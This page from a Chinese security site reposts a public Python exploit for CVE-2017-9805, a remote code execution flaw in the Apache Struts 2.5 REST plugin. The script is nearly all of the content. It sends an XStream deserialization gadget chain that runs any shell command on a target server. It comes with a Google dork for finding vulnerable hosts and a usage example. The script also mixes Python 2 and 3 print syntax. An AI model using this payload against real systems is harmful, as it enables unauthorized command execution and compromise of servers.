首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Apache Struts 2.5 < 2.5.12 - REST Plugin XStream Remote Code Execution
来源:http://securityattack.com.br/ 作者:Warflop 发布时间:2017-09-08  
# Exploit Title: Struts 2.5 - 2.5.12 REST Plugin XStream RCE
# Google Dork: filetype:action
# Date: 06/09/2017
# Exploit Author: Warflop
# Vendor Homepage: https://struts.apache.org/
# Software Link: http://mirror.nbtelecom.com.br/apache/struts/2.5.10/struts-2.5.10-all.zip
# Version: Struts 2.5 – Struts 2.5.12
# Tested on: Struts 2.5.10
# CVE : 2017-9805
 
#!/usr/bin/env python3
# coding=utf-8
# *****************************************************
# Struts CVE-2017-9805 Exploit
# Warflop (http://securityattack.com.br/)
# Greetz: Pimps & G4mbl3r
# *****************************************************
import requests
import sys
 
def exploration(command):
 
    exploit = '''
                <map>
                <entry>
                <jdk.nashorn.internal.objects.NativeString>
                <flags>0</flags>
                <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
                <dataHandler>
                <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
                <is class="javax.crypto.CipherInputStream">
                <cipher class="javax.crypto.NullCipher">
                <initialized>false</initialized>
                <opmode>0</opmode>
                <serviceIterator class="javax.imageio.spi.FilterIterator">
                <iter class="javax.imageio.spi.FilterIterator">
                <iter class="java.util.Collections$EmptyIterator"/>
                <next class="java.lang.ProcessBuilder">
                <command>
                <string>/bin/sh</string><string>-c</string><string>'''+ command +'''</string>
                </command>
                <redirectErrorStream>false</redirectErrorStream>
                </next>
                </iter>
                <filter class="javax.imageio.ImageIO$ContainsFilter">
                <method>
                <class>java.lang.ProcessBuilder</class>
                <name>start</name>
                <parameter-types/>
                </method>
                <name>foo</name>
                </filter>
                <next class="string">foo</next>
                </serviceIterator>
                <lock/>
                </cipher>
                <input class="java.lang.ProcessBuilder$NullInputStream"/>
                <ibuffer/>
                <done>false</done>
                <ostart>0</ostart>
                <ofinish>0</ofinish>
                <closed>false</closed>
                </is>
                <consumed>false</consumed>
                </dataSource>
                <transferFlavors/>
                </dataHandler>
                <dataLen>0</dataLen>
                </value>
                </jdk.nashorn.internal.objects.NativeString>
                <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
                </entry>
                <entry>
                <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
                <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
                </entry>
                </map>
                '''
 
 
    url = sys.argv[1]
 
    headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0',
            'Content-Type': 'application/xml'}
 
    request = requests.post(url, data=exploit, headers=headers)
    print request.text
 
if len(sys.argv) < 3:
    print ('CVE: 2017-9805 - Apache Struts2 Rest Plugin Xstream RCE')
    print ('[*] Warflop - http://securityattack.com.br')
    print ('[*] Greatz: Pimps & G4mbl3r')
    print ('[*] Use: python struts2.py URL COMMAND')
    print ('[*] Example: python struts2.py http://sitevulnerable.com/struts2-rest-showcase/orders/3 id')
    exit(0)
else:
    exploration(sys.argv[2])
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Tor - Linux Sandbox Breakout v
·Gh0st Client - Buffer Overflow
·Jungo DriverWizard WinDriver -
·PlugX Controller Stack Overflo
·Jungo DriverWizard WinDriver -
·Apache Struts 2 REST Plugin XS
·Mongoose Web Server 6.5 - Cros
·D-Link 850L XSS / Backdoor / C
·NEC EXPRESS CLUSTER clpwebmc R
·Docker Daemon Unprotected TCP
·Dup Scout Enterprise 9.9.14 -
·MobaXtrem 10.4 Remote Code Exe
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved